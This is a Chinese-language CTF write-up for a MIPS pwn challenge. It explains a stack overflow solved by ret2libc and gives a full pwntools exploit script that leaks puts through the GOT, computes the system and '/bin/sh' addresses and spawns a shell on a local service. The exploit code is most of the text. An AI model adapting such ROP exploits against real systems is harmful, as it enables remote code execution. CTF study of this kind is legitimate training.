点击此处获得更好的阅读体验
WriteUp来源
https://xz.aliyun.com/t/6912
题目考点
解题思路
分析
逆向代码,在 vuln 函数中存在一处栈溢出
但是没有 system 函数,需要进行 ret2libc 的利用,先泄露出 got 表里面的内容,之后调用 system 函数即可。
/bin/sh 字符串在 libc 中也可以找到,直接调用 system("/bin/sh") 即可
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
| from pwn import *
r = remote("127.0.0.1",8881)
elf = ELF("./pwn2")
libc = ELF("/home/h4lo/mipsel-env/lib/libuClibc-0.9.33.2.so")
payload = "H4lo"
r.recvuntil("What's your name:")
r.sendline(payload)
sleep(0.2)
r.recv()
sleep(0.2)
payload = p32(1) * 9
payload += p32(0x004006C8)
payload += p32(1)
payload += "a" * 0x18
payload += 'a' * 4
payload += p32(0x00410B58)
payload += p32(0x0040092C)
payload += 'a' * 4
payload += p32(0x004007A4)
payload += 'a'*0x20
payload += p32(0x004007C4)
sleep(0.2)
r.send(payload)
r.recv()
libc_addr = u32(r.recv(4))-libc.symbols['puts']
success("libc_addr: " + hex(libc_addr))
r.recv()
system_addr = libc_addr + libc.symbols['system']
binsh_addr = libc_addr + 0x9bc48
payload = 'a'*0x24
payload += p32(0x004006C8)
payload += 'a'*0x1c
payload += 'a'*4
payload += p32(binsh_addr)
payload += p32(system_addr)
payload += 'a'*4
payload += p32(0x004007A4)
r.send(payload)
r.interactive()
|